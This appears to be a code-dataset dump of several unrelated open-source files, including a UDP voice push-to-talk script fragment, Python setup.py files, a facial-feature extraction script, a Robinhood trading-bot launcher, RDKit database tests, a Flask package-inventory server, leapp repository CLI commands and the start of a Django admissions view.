    udp.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # To enable broadcast
if IP == "" or mask_tx == "":
ErrorFalta = faltante()
print("Por favor especifique la " + ErrorFalta)
else:
pdebug("IP seteada a: " + IP)
pdebug("Mascara de Transmision seteada a: " + mask_tx.decode("utf-8") )
#Server
#print("Preparando Stream de Grabacion...")
streamInput = pi.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = CHUNK,
stream_callback = callbackInput
)
streamInput.stop_stream()
if gpioEnable:
ptt_timer = Timer(1.0, timeout)
gpio.setmode(gpio.BCM)
gpio.setup(18,gpio.OUT)
#print("Activando Server...")
TServer = Thread(target = tServer, args=(CHUNK,))
TServer.setDaemon(True)
TServer.start()
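# Minimal usage sketch (illustrative only; the IP and mask values are examples):
#   import voip_p2p
#   voip_p2p.start()                          # client mode, binds UDP port 50001
#   voip_p2p.ptt_on("192.168.1.255")          # transmit to that broadcast address
#   voip_p2p.ptt_off()                        # release the push-to-talk
#   voip_p2p.sel_masc_rx(b'\x00\x00\x00\x00\x00\x00\x00\x02')  # accept another rx mask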
| gpl-3.0 | -7,545,945,220,337,320,000 | 24.468085 | 111 | 0.574353 | false |
Zentyal/zentyal-swift-middleware | setup.py | 1 | 1147 | #!/usr/bin/python
# Copyright 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
import swift3
setup(name='swift3',
version=swift3.version,
description='Swift AmazonS3 API emulation Middleware',
author='OpenStack, LLC.',
author_email='[email protected]',
url='https://github.com/fujita/swift3',
packages=['swift3'],
requires=['swift(>=1.4)', 'python_dateutil(>=2.1)'],
entry_points={'paste.filter_factory':
['swift3=swift3.middleware:filter_factory',
's3auth=swift3.auth:filter_factory']})
| apache-2.0 | 703,918,658,693,047,300 | 36 | 74 | 0.691369 | false |
maguro/flask-MenuManager | setup.py | 1 | 2624 | # !/usr/bin/env python
#
# (C) Copyright 2014 Alan Cabrera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from io import open
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class ToxCommand(TestCommand):
user_options = [('tox-args=', 'a', "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
errno = tox.cmdline(args=shlex.split(self.tox_args))
sys.exit(errno)
setup(
name='flask-MenuManager',
version='1.0',
url='https://github.com/maguro/flask-MenuManager/',
license='Apache License (http://www.apache.org/licenses/LICENSE-2.0)',
author='Alan Cabrera',
author_email='[email protected]',
description='An easy way to build and manage menus in Flask',
# don't ever depend on refcounting to close files anywhere else
long_description=open('README.md', encoding='utf-8').read(),
package_dir={'': 'src'},
packages=['flask_MenuManager'],
zip_safe=False,
platforms='any',
install_requires=[
'Flask'
],
tests_require=['tox'],
cmdclass={'test': ToxCommand},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
)
| apache-2.0 | 7,186,223,080,216,033,000 | 29.870588 | 74 | 0.650915 | false |
marcusangeloni/smc2016 | processing/feature_extraction.py | 1 | 9777 | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Marcus de Assis Angeloni <[email protected]>
# Thu 7 Apr 2016 21:12:03
import numpy
import bob.ip.base
import bob.ip.gabor
import os
import sys
import math
import skimage.feature
from skimage.feature import greycomatrix, greycoprops
from scipy.stats import itemfreq
import argparse
from datetime import datetime
# compute tan and triggs illumination
def compute_tanTriggs(image):
tt = bob.ip.base.TanTriggs(gamma = 0.2,
sigma0 = 1.,
sigma1 = 2.,
radius = 5,
threshold = 10.,
alpha = 0.1)
data = tt(image)
return data
# compute gray-level co-occurrence matrix descriptor
def compute_glcm(image):
glcm = greycomatrix(image,
distances = [1, 2, 3, 4],
angles = [0, numpy.pi/4, numpy.pi/2, 3*numpy.pi/4],
levels = 256,
symmetric = False,
normed = True)
features = numpy.zeros((6, glcm.shape[2] * glcm.shape[3]), dtype = numpy.float64)
features[0, :] = greycoprops(glcm, 'contrast').flatten()
features[1, :] = greycoprops(glcm, 'energy').flatten()
features[2, :] = greycoprops(glcm, 'homogeneity').flatten()
features[3, :] = greycoprops(glcm, 'dissimilarity').flatten()
features[4, :] = greycoprops(glcm, 'correlation').flatten()
features[5, :] = greycoprops(glcm, 'ASM').flatten()
return features
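# With 4 distances x 4 angles, greycoprops returns a (4, 4) matrix per property,
# so the GLCM descriptor above has shape (6, 16): one row per texture property,
# flattened over the 16 distance/angle combinations.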
# compute 2D Discrete Cosine Transform descriptor
def compute_dct(image):
# block = 12x12, overlap = 11x11, normalized block, normalized features
dct = bob.ip.base.DCTFeatures(coefficients = 45,
block_size = (12, 12),
block_overlap = (11, 11),
normalize_block = True,
normalize_dct = True)
features = dct(image)
return features
# compute local binary patterns
def compute_lbp(image, P, R, blockSize, overlap):
stepY = blockSize[0] - overlap[0]
stepX = blockSize[1] - overlap[1]
bins = P * (P - 1) + 3
lbp = bob.ip.base.LBP(neighbors = P,
radius = R,
circular = True,
to_average = False,
add_average_bit = False,
uniform = True,
rotation_invariant = False)
lbpImage = lbp(image)
nBlocksY = (lbpImage.shape[0] - overlap[0]) // stepY
nBlocksX = (lbpImage.shape[1] - overlap[1]) // stepX
totalBlocks = nBlocksY * nBlocksX
features = numpy.zeros((totalBlocks, bins), dtype = numpy.float64)
idx = 0
y1 = 0
y2 = blockSize[0]
while (y2 <= lbpImage.shape[0]):
x1 = 0
x2 = blockSize[1]
while (x2 <= lbpImage.shape[1]):
block = lbpImage[y1:y2, x1:x2]
values = itemfreq(block.ravel())
for v in values:
features[idx, int(v[0])] = v[1]
x1 += stepX
x2 += stepX
idx += 1
y1 += stepY
y2 += stepY
return features
# compute multiscale local binary pattern descriptor
def compute_mlbp(image, P, blockSize, overlap):
# R = 1
features_r1 = compute_lbp(image[2:image.shape[0]-2, 2:image.shape[1]-2], P, 1, blockSize, overlap) # to get the same dimension of radius = 3
# R = 3
features_r3 = compute_lbp(image, P, 3, blockSize, overlap)
features = numpy.concatenate((features_r1, features_r3), axis=1)
return features
# compute histogram of oriented gradients
def compute_hog(image, pixels_cell):
features = skimage.feature.hog(image,
orientations = 9,
pixels_per_cell = pixels_cell,
cells_per_block=(1, 1))
return features
# compute histogram of oriented gradients descriptor
def compute_hog_descriptor(image):
    # 4x4 blocks
features_b4 = compute_hog(image, (4, 4))
    # 8x8 blocks
features_b8 = compute_hog(image, (8, 8))
features = numpy.concatenate((features_b4, features_b8))
return features
# compute gabor wavelet descriptor
def compute_gabor(image):
gwt = bob.ip.gabor.Transform(number_of_scales = 5,
number_of_directions = 8,
sigma = 2 * math.pi,
k_max = math.pi / 2.,
k_fac = math.sqrt(.5),
power_of_k = 0,
dc_free = True)
image_c = image.astype(numpy.complex128)
trafo_image = gwt.transform(image_c)
features = numpy.abs(trafo_image)
return features
#################
# main block
#################
# Get arguments
parser = argparse.ArgumentParser(description='Feature extraction')
parser.add_argument('image_dir', default='', help='Image directory root (with facial parts folders and npy files)')
parser.add_argument('output_dir', default='', help='Output directory with extracted features')
parser.add_argument('features', default='', help='Features to be extracted [all, dct, mlbp, hog, gabor, glcm]')
args = parser.parse_args()
if (not(os.path.exists(args.image_dir))):
print('Image directory root (\"' + args.image_dir + '\") not found.')
exit()
if (not(os.path.exists(args.output_dir))):
os.mkdir(args.output_dir)
if not(args.features in ['all', 'dct', 'mlbp', 'hog', 'gabor', 'glcm']):
print('Features not implemented (\"' + args.image_dir + '\"). Available: [all, dct, mlbp, hog, gabor, glcm]')
exit()
image_dir = args.image_dir
output_dir = args.output_dir
features = args.features
print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - feature extraction started")
print("Image directory: " + image_dir)
print("Output directory: " + output_dir)
print("Selected features: " + features)
partList = os.listdir(image_dir)
for part in partList:
in_part_dir = os.path.join(image_dir, part)
print (in_part_dir)
if (not(os.path.isdir(in_part_dir))):
continue
print (datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Current facial part " + part)
out_part_dir = os.path.join(output_dir, part)
# create feature directories
if (not(os.path.exists(out_part_dir))):
os.mkdir(out_part_dir)
if (features in ['all', 'dct']):
dct_dir = os.path.join(out_part_dir, 'dct')
if (not(os.path.exists(dct_dir))):
os.mkdir(dct_dir)
if (features in ['all', 'mlbp']):
mlbp_dir = os.path.join(out_part_dir, 'mlbp')
if (not(os.path.exists(mlbp_dir))):
os.mkdir(mlbp_dir)
if (features in ['all', 'hog']):
hog_dir = os.path.join(out_part_dir, 'hog')
if (not(os.path.exists(hog_dir))):
os.mkdir(hog_dir)
if (features in ['all', 'gabor']):
gabor_dir = os.path.join(out_part_dir, 'gabor')
if (not(os.path.exists(gabor_dir))):
os.mkdir(gabor_dir)
if (features in ['all', 'glcm']):
glcm_dir = os.path.join(out_part_dir, 'glcm')
if (not(os.path.exists(glcm_dir))):
os.mkdir(glcm_dir)
images = os.listdir(in_part_dir)
for i in images:
if (i[len(i)-3:len(i)] != 'npy'): # check the file extension
continue
print (datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Current file " + i)
img = numpy.load(os.path.join(in_part_dir, i))
tt_img = compute_tanTriggs(img)
if (features in ['all', 'dct']):
descriptor = compute_dct(tt_img)
numpy.save(os.path.join(dct_dir, i), descriptor)
if (features in ['all', 'gabor']):
descriptor = compute_gabor(tt_img)
numpy.save(os.path.join(gabor_dir, i), descriptor)
if (features in ['all', 'glcm']):
descriptor = compute_glcm(img) # without tan and triggs
numpy.save(os.path.join(glcm_dir, i), descriptor)
if (features in ['all', 'hog']):
            # remove border according to each facial part
if (part =='eyebrows'):
img_hog = tt_img[2:18, 3:139]
elif (part =='eyes'):
img_hog = tt_img[3:27, 2:154]
elif (part == 'nose'):
img_hog = tt_img[1:113, 1:161]
elif (part == 'mouth'):
img_hog = tt_img[1:81, 3:139]
else:
img_hog = None
print('HOG not calculated due to facial part is unknown (' + part + ')')
if not(img_hog is None):
descriptor = compute_hog_descriptor(img_hog)
numpy.save(os.path.join(hog_dir, i), descriptor)
if (features in ['all', 'mlbp']):
# neighbors, block size and overlap according to each facial part
if (part in ['eyebrows', 'eyes']):
descriptor = compute_mlbp(tt_img, 8, (8, 8), (4, 4))
elif (part == 'nose'):
descriptor = compute_mlbp(tt_img, 8, (16, 16), (8, 8))
elif (part == 'mouth'):
descriptor = compute_mlbp(tt_img, 4, (16, 16), (8, 8))
else:
descriptor = None
print('MLBP not calculated due to facial part is unknown (' + part + ')')
if not(descriptor is None):
numpy.save(os.path.join(mlbp_dir, i), descriptor)
print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - feature extraction finished") | apache-2.0 | -5,217,122,152,457,738,000 | 33.797153 | 144 | 0.542293 | false |
codesociety/friartuck | friar_tuck_run.py | 1 | 5477 | """
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import argparse
import sys
from friartuck.api import FriarTuckLive, Order
import logging
from os import path
import configparser
parser = argparse.ArgumentParser(description='FriarTuck Quant Robinhood Broker Application')
parser.add_argument('--algo_script', action="store", dest="algo_script", help="Algorithm script file")
parser.add_argument('--config_file', action="store", dest="config_file",
help="Configuration file which should include credentials")
parser.add_argument('--data_frequency', action="store", dest="data_frequency",
help="[1m, 5m, 15m, 1h, 1d] The frequency of bar data... default is 1h")
# parser.add_argument('--tzone', action="store", dest="tzone", help="Time_zone")
log = logging.getLogger("friar_tuck")
PATH = path.abspath(path.dirname(__file__))
ROOT = path.dirname(PATH)
friar_tuck = None
def get_config(config_filename):
friar_config = configparser.ConfigParser(
interpolation=configparser.ExtendedInterpolation(),
allow_no_value=True,
delimiters='=',
inline_comment_prefixes='#'
)
local_filename = config_filename.replace('.cfg', '_local.cfg')
if path.isfile(local_filename):
config_filename = local_filename
with open(config_filename, 'r') as file:
friar_config.read_file(file)
return friar_config
def get_datetime():
return friar_tuck.get_datetime()
def lookup_security(symbol):
return friar_tuck.fetch_and_build_security(symbol)
def get_order(order):
# Checking to see if the order is the Order object, if yes, use the id
if isinstance(order, Order):
return friar_tuck.get_order(order.id)
return friar_tuck.get_order(order)
def get_last_filled_buy_order(security):
return friar_tuck.get_last_filled_buy_order(security=security)
def get_last_filled_sell_order(security):
return friar_tuck.get_last_filled_sell_order(security=security)
def get_last_filled_orders_by_side(security):
return friar_tuck.get_last_filled_orders_by_side(security=security)
def get_open_orders(security=None):
return friar_tuck.get_open_orders(security)
def cancel_order(order):
# Checking to see if the order is the Order object, if yes, use the id
if isinstance(order, Order):
return friar_tuck.cancel_order(order.id)
return friar_tuck.cancel_order(order)
def order_shares(security, shares, order_type=None, time_in_force='gfd'):
return friar_tuck.order_shares(security, shares, order_type, time_in_force)
def order_value(security, amount, order_type=None, time_in_force='gfd'):
return friar_tuck.order_value(security, amount, order_type, time_in_force)
def start_engine(input_args):
args = parser.parse_args(input_args)
global trading_algo, config
trading_algo = __import__(args.algo_script)
config_file = args.config_file
data_frequency = args.data_frequency
if not data_frequency:
data_frequency = "1h"
CONFIG_FILENAME = path.join(PATH, config_file)
config = get_config(CONFIG_FILENAME)
# os.environ['TZ'] = 'US/Eastern'
# time.tzset()
if (not config.get('LOGIN', 'username')) or (not config.get('LOGIN', 'password')):
exit('no login credentials given')
"""Start Shell Setup"""
global friar_tuck
friar_tuck = FriarTuckLive(config=config,
data_frequency=data_frequency)
trading_algo.friar_tuck = friar_tuck
trading_algo.lookup_security = lookup_security
trading_algo.get_order = get_order
trading_algo.get_last_filled_buy_order = get_last_filled_buy_order
trading_algo.get_last_filled_sell_order = get_last_filled_sell_order
trading_algo.get_last_filled_orders_by_side = get_last_filled_orders_by_side
trading_algo.get_open_orders = get_open_orders
trading_algo.cancel_order = cancel_order
trading_algo.order_shares = order_shares
trading_algo.order_value = order_value
trading_algo.get_datetime = get_datetime
friar_tuck.set_active_algo(trading_algo)
friar_tuck.run_engine()
"""End Shell Setup"""
if __name__ == "__main__":
# if len(sys.argv) <= 2:
# exit("Too less arguments calling script")
start_engine(sys.argv[1:])
while 1:
# log.info("Alive and well: %s" % datetime.datetime.now())
time.sleep(60)
friar_tuck.stop_engine()
time.sleep(1)
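# Example invocation (illustrative; the script and config names are placeholders
# for your own files). The algo script is loaded with __import__, so it is given
# without the .py extension:
#   python friar_tuck_run.py --algo_script my_algo --config_file config.cfg --data_frequency 15m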
| mit | 4,185,251,554,969,019,400 | 31.408284 | 102 | 0.708782 | false |
adalke/rdkit | rdkit/Dbase/UnitTestDbUtils.py | 1 | 4157 | # $Id$
#
# Copyright (C) 2002-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for the database utilities
"""
from rdkit import RDConfig
import unittest,os,tempfile
from rdkit.Dbase import DbUtils
from rdkit.Dbase.DbConnection import DbConnect
class TestCase(unittest.TestCase):
def setUp(self):
#print '\n%s: '%self.shortDescription(),
self.baseDir = os.path.join(RDConfig.RDCodeDir,'Dbase','test_data')
self.dbName = RDConfig.RDTestDatabase
if RDConfig.useSqlLite:
tmpf,tempName = tempfile.mkstemp(suffix='sqlt')
self.tempDbName = tempName
else:
self.tempDbName='::RDTests'
self.colHeads=('int_col','floatCol','strCol')
self.colTypes=('integer','float','string')
def tearDown(self):
if RDConfig.useSqlLite and os.path.exists(self.tempDbName):
try:
os.unlink(self.tempDbName)
except:
import traceback
traceback.print_exc()
def _confirm(self,tblName,dbName=None):
if dbName is None: dbName = self.dbName
conn = DbConnect(dbName,tblName)
res = conn.GetColumnNamesAndTypes()
assert len(res)==len(self.colHeads),'bad number of columns'
names = [x[0] for x in res]
for i in range(len(names)):
assert names[i].upper()==self.colHeads[i].upper(),'bad column head'
if RDConfig.useSqlLite:
# doesn't seem to be any column type info available
return
types = [x[1] for x in res]
for i in range(len(types)):
assert types[i]==self.colTypes[i],'bad column type'
def test1Txt(self):
""" test reading from a text file """
with open(os.path.join(self.baseDir,'dbtest.csv'),'r') as inF:
tblName = 'fromtext'
DbUtils.TextFileToDatabase(self.tempDbName,tblName,inF)
self._confirm(tblName,dbName=self.tempDbName)
def test3Txt(self):
""" test reading from a text file including null markers"""
with open(os.path.join(self.baseDir,'dbtest.nulls.csv'),'r') as inF:
tblName = 'fromtext2'
DbUtils.TextFileToDatabase(self.tempDbName,tblName,inF,nullMarker='NA')
self._confirm(tblName,dbName=self.tempDbName)
def testGetData1(self):
""" basic functionality
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=1)
assert len(d)==10
assert tuple(d[0])==(0,11)
assert tuple(d[2])==(4,31)
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData2(self):
""" using a RandomAccessDbResultSet
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=1)
assert tuple(d[0])==(0,11)
assert tuple(d[2])==(4,31)
assert len(d)==10
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData3(self):
""" using a DbResultSet
"""
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=0)
with self.assertRaisesRegexp(TypeError, ""):
len(d)
rs = []
for thing in d:
rs.append(thing)
assert len(rs)==10
assert tuple(rs[0])==(0,11)
assert tuple(rs[2])==(4,31)
def testGetData4(self):
""" using a RandomAccessDbResultSet with a Transform
"""
fn = lambda x:(x[0],x[1]*2)
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=1,
transform=fn)
assert tuple(d[0])==(0,22)
assert tuple(d[2])==(4,62)
assert len(d)==10
with self.assertRaisesRegexp(IndexError, ""):
d[11]
def testGetData5(self):
""" using a DbResultSet with a Transform
"""
fn = lambda x:(x[0],x[1]*2)
d = DbUtils.GetData(self.dbName,'ten_elements',forceList=0,randomAccess=0,
transform=fn)
with self.assertRaisesRegexp(TypeError, ""):
len(d)
rs = []
for thing in d:
rs.append(thing)
assert len(rs)==10
assert tuple(rs[0])==(0,22)
assert tuple(rs[2])==(4,62)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 924,426,392,574,821,400 | 29.343066 | 78 | 0.639163 | false |
slugbucket/package-inventory-server | python/PackageInventoryServer.py | 1 | 1237 | #!/usr/bin/env python
#
# Run the server with
# $ export FLASK_APP=PackageInventoryServer.py
# $ flask run --host=0.0.0.0
#
from flask import Flask, abort, request
import os.path
app = Flask(__name__)
#
# Based on http://flask.pocoo.org/docs/0.11/quickstart/#routing
#
@app.route('/package-inventory/<hostname>', methods=["GET"])
def get_inventory_package(hostname):
fn = "cache/%s" % hostname
if os.path.isfile(fn):
fh = open(fn ,"r")
return( fh.read() )
else:
abort(404)
@app.route('/package-inventory/packages/new', methods=["POST"])
def post_inventory_package():
if validate_input(request) == False:
abort(400)
jdata = request.get_json()
if (jdata['hostname'] != None):
hostname = jdata['hostname']
else:
hostname = request.host
fn = "cache/%s" % hostname
fh = open(fn ,"w")
if fh.write( str(request.data, 'utf-8') ):
st = "{\"status\":\"Received packages for %s.\"}" % hostname
return ( st )
else:
abort(400)
# Method to check that the input data matches expectations
def validate_input(request):
    if not request.is_json:
        return False
    return True
if __name__ == "__main__":
app.run()
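# Example requests (illustrative; hostname and payload are placeholders --
# the server stores whatever JSON body it receives under cache/<hostname>):
#   curl http://localhost:5000/package-inventory/myhost
#   curl -X POST -H "Content-Type: application/json" \
#        -d '{"hostname": "myhost", "packages": ["bash-5.0"]}' \
#        http://localhost:5000/package-inventory/packages/new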
| apache-2.0 | -1,550,531,850,034,835,200 | 24.244898 | 68 | 0.602264 | false |
leapp-to/prototype | leapp/snactor/commands/repo/__init__.py | 1 | 8710 | from __future__ import print_function
import json
import os
import subprocess
import sys
from leapp.utils.clicmd import command, command_opt, command_arg
from leapp.utils.repository import requires_repository, find_repository_basedir, get_repository_name, \
get_repository_id, add_repository_link, get_user_config_repos, get_user_config_repo_data, \
get_global_repositories_data
from leapp.exceptions import CommandError, UsageError
_MAIN_LONG_DESCRIPTION = '''
This group of commands are around managing repositories.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@command('repo', help='Repository related commands', description=_MAIN_LONG_DESCRIPTION)
def repo(args): # noqa; pylint: disable=unused-argument
pass
_HEALTH_CHECK_LONG_DESCRIPTION = '''
Health check is used to remove stale repository entries from the user local repository registration.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('health-check', help='Checks registered repositories and removes missing entries',
description=_HEALTH_CHECK_LONG_DESCRIPTION)
def health_check(args): # noqa; pylint: disable=unused-argument
to_remove = []
data = get_user_config_repo_data()
if not data:
return
for uuid, path in data.get('repos', {}).items():
if not os.path.isdir(path):
print('Removing repository {uuid} => {path}'.format(uuid=uuid, path=path))
to_remove.append(uuid)
for uuid in to_remove:
data.get('repos', {}).pop(uuid, None)
with open(get_user_config_repos(), 'w') as f:
json.dump(data, f)
_LIST_LONG_DESCRIPTION = '''
Lists repositories on the system. By default it will list all registered user repositories.
It also can list global repositories on the system which usually reside in /usr/share/leapp-repository/
by using the --global commandline flag.
When using the --all commandline flag, all repositories user and globally are listed.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('list', help='Lists repositories', description=_LIST_LONG_DESCRIPTION)
@command_opt('global', is_flag=True, help='List globally available repositories only.')
@command_opt('all', is_flag=True, help='List all available user and global repositories.')
def list_repos(args):
global_repos = {}
if getattr(args, 'global', None) or args.all:
global_repos = get_global_repositories_data()
for entry in global_repos.values():
print('{name:<35} [{uuid}] => {path}'.format(name=entry['name'], path=entry['path'], uuid=entry['id']))
if not getattr(args, 'global', None):
user_repos = get_user_config_repo_data()
for path in user_repos.get('repos', {}).values():
if os.path.isdir(path):
name = get_repository_name(path)
uuid = get_repository_id(path)
print('{name:<35} [{uuid}] => {path}'.format(name=name, path=path, uuid=uuid))
def register_path(path):
"""
    Calling this function will register a path as a known user repository.
    :param path: Path to the repository
:return:
"""
path = os.path.abspath(os.path.realpath(path))
data = {}
repos = get_user_config_repos()
if os.path.isfile(repos):
with open(repos) as f:
data = json.load(f)
data.setdefault('repos', {}).update({get_repository_id(path): path})
with open(repos, 'w') as f:
json.dump(data, f)
_REGISTER_LONG_DESCRIPTION = '''
Registers the current user repository in the users repository registry.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('register', help='Registers the current repository in the user repository registry.',
description=_REGISTER_LONG_DESCRIPTION)
@requires_repository
def register_repo(args): # noqa; pylint: disable=unused-argument
base_dir = find_repository_basedir('.')
if base_dir:
register_path(base_dir)
print('Repository successfully registered')
_LINK_LONG_DESCRIPTION = '''
Links a given repository to the current repository.
Linking a repository is needed, when the current repository requires things like
Tags, Models, Topics, Workflows etc from another repository and needs to be executable
with `snactor`. Snactor does not know otherwise that it will need to load the content
from another repository. Linking the repositories will make snactor load the items
from the linked repositories.
Repositories can be linked by path, name and repository id.
When using the repository name, beware that the first matching name will be linked.
Therefore it's recommended to rather link repositories by path or repository id.
Usage:
$ snactor repo link --path ../../other-repository
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('link', help='Links a given repository to the current one', description=_LINK_LONG_DESCRIPTION)
@command_opt('path', help='Path to the repository to link')
@command_opt('name', help='Name of the repository to link')
@command_opt('uuid', help='UUID of the repository to link', )
@requires_repository
def link_repo(args):
if not any((args.path, args.name, args.uuid)):
raise UsageError('Please specify either --path, --name or --uuid to link another repository.')
data = get_user_config_repo_data()
path = args.path
if not path:
if args.uuid:
path = data.get('repos', {}).get(args.uuid, None)
elif args.name:
for repository_path in data.get('repos', {}).values():
if os.path.isdir(repository_path):
if args.name == get_repository_name(repository_path):
path = repository_path
break
if not path:
raise UsageError('Please specify a valid repository name, uuid or path')
if add_repository_link('.', get_repository_id(path)):
print('Added link to repository {path} - {name}'.format(path=path, name=get_repository_name(path)))
_FIND_LONG_DESCRIPTION = '''
Searches for all repositories and registers them.
When not specifying --path - It will search from the current working directory for existing
leapp repositories and registers all found repositories with the users repository registration.
By using --skip-registration it can be used to just detect repositories without registering them.
If another path should be scanned than the current working directory pass the --path flag.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('find', help='Find and registers all repositories')
@command_opt('skip-registration', is_flag=True, help='Do not register discovered repositories.')
@command_opt('path', help='Path to scan from - If not specified the current working directory is assumed')
def find_repositories(args):
path = args.path or os.path.realpath('.')
result = subprocess.check_output(['/usr/bin/find', '-L', path, '-name', '.leapp']).decode('utf-8')
for repository in result.split('\n'):
if repository.strip():
repository = os.path.dirname(repository)
if not args.skip_registration:
print('Registering {path}'.format(path=repository))
register_path(repository)
else:
print(repository)
_REPOSITORY_CONFIG = '''
[repositories]
repo_path=${repository:root_dir}
[database]
path=${repository:state_dir}/leapp.db
'''
_LONG_DESCRIPTION = '''
Creates a new local repository for writing Actors, Models, Tags,
Topics, and Workflows or adding shared files, tools or libraries.
For more information please consider reading the documentation at:
https://red.ht/leapp-docs
'''
@repo.command('new', help='Creates a new repository', description=_LONG_DESCRIPTION)
@command_arg('name')
def new_repository(args):
name = args.name
basedir = os.path.join('.', name)
if os.path.isdir(basedir):
raise CommandError("Directory already exists: {}".format(basedir))
os.mkdir(basedir)
repository_dir = os.path.join(basedir, '.leapp')
os.mkdir(repository_dir)
with open(os.path.join(repository_dir, 'info'), 'w') as f:
json.dump({
'name': name
}, f)
with open(os.path.join(repository_dir, 'leapp.conf'), 'w') as f:
f.write(_REPOSITORY_CONFIG)
register_path(basedir)
sys.stdout.write("New repository {} has been created in {}\n".format(name, os.path.realpath(name)))
| lgpl-2.1 | 6,380,800,431,282,541,000 | 36.381974 | 111 | 0.691848 | false |
007gzs/django_restframework_apiview | apiview/code.py | 1 | 1380 | # encoding: utf-8
from __future__ import absolute_import, unicode_literals
class CodeData(object):
def __init__(self, code, tag, message):
self.code = code
self.message = message
self.tag = tag
def __str__(self):
return str(self.code)
def __eq__(self, other):
if isinstance(other, CodeData):
return other.code == self.code
elif isinstance(other, type(self.code)):
return other == self.code
else:
return super(CodeData, self).__eq__(other)
def get_res_dict(self, **kwargs):
ret = dict(kwargs)
ret['code'] = self.code
if 'message' not in ret:
ret['message'] = self.message
return ret
class Code(object):
def __init__(self, code_define):
codes = set()
self._list = list()
self._dict = dict()
self._tags = list()
for tag, code, message in code_define:
assert code not in codes and not hasattr(self, tag)
setattr(self, tag, CodeData(code, tag, message))
codes.add(code)
self._tags.append(tag)
self._list.append((code, message))
self._dict[code] = message
def get_list(self):
return self._list
def get_dict(self):
return self._dict
def get_tags(self):
return self._tags
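# Illustrative usage sketch (editor's addition, not part of the original module);
# the tag/code/message triples below are made-up examples.
if __name__ == '__main__':
    ERROR_CODES = Code((
        ('SUCCESS', 0, 'OK'),
        ('ERR_PARAM', 10001, 'parameter error'),
    ))
    # CodeData compares equal to its numeric code
    assert ERROR_CODES.SUCCESS == 0
    # build a response dict carrying code, message and extra payload
    print(ERROR_CODES.SUCCESS.get_res_dict(data={'key': 'value'}))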
| lgpl-3.0 | -7,000,125,340,502,342,000 | 25.037736 | 63 | 0.546377 | false |
jittat/ku-eng-direct-admission | application/views/account.py | 1 | 13340 | # -*- coding: utf-8 -*-
from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from django.conf import settings
from django import forms
from MySQLdb import IntegrityError
from commons.utils import redirect_to_index, submission_deadline_passed
from application.views import redirect_to_first_form
from application.views import redirect_to_applicant_first_page
from application.models import Applicant
from application.models import SubmissionInfo
from application.models import Registration
from application.forms import LoginForm, ForgetPasswordForm
